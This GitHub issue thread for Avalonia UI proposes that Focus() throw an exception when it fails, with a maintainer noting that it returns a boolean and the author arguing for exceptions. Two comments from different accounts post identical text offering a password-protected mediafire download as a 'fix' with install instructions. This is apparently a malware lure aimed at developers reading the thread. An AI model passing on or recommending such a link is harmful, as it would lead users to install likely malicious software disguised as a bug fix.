### ISSUE TITLE
Throw exception when Focus() fails.

### ISSUE THREAD

**Issue by mateli** [AvaloniaUI/Avalonia#16821]
### Describe the bug

When calling Focus() from the constructor or OnInitialized it silently fails with weird behavior. 

Also when calling Focus when a component or it's parent component has IsVisible == false this silently fails.

### To Reproduce

Call Focus() from constructor, OnInitialized or when the component/parent is disabled.

### Expected behavior

When Focus() cannot be performed an Exception should be thrown.

### Avalonia version

11.1.3

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by maxkatz6** [comment]
`Focus` method returns a boolean indicating operation result. It would be very wasteful to throw an exception every time.

**Comment by mateli** [comment]
If focus() or any other function fail because it is run to early this is 100% a bug and an exception makes sure that the developers are informed of the bug. Correct usage will not cause an exception. Also if focus() can fail for more than one reason how do I know that reason from getting a boolean?

And even if so to me exceptions are way more clean than requiring testing with if's. Getting to collect error handling into a single try...catch is one of the beautiful things with C#. Especially as one need to surround code with try...catch statements anyway means that handling another error doesn't produce more error handling code.
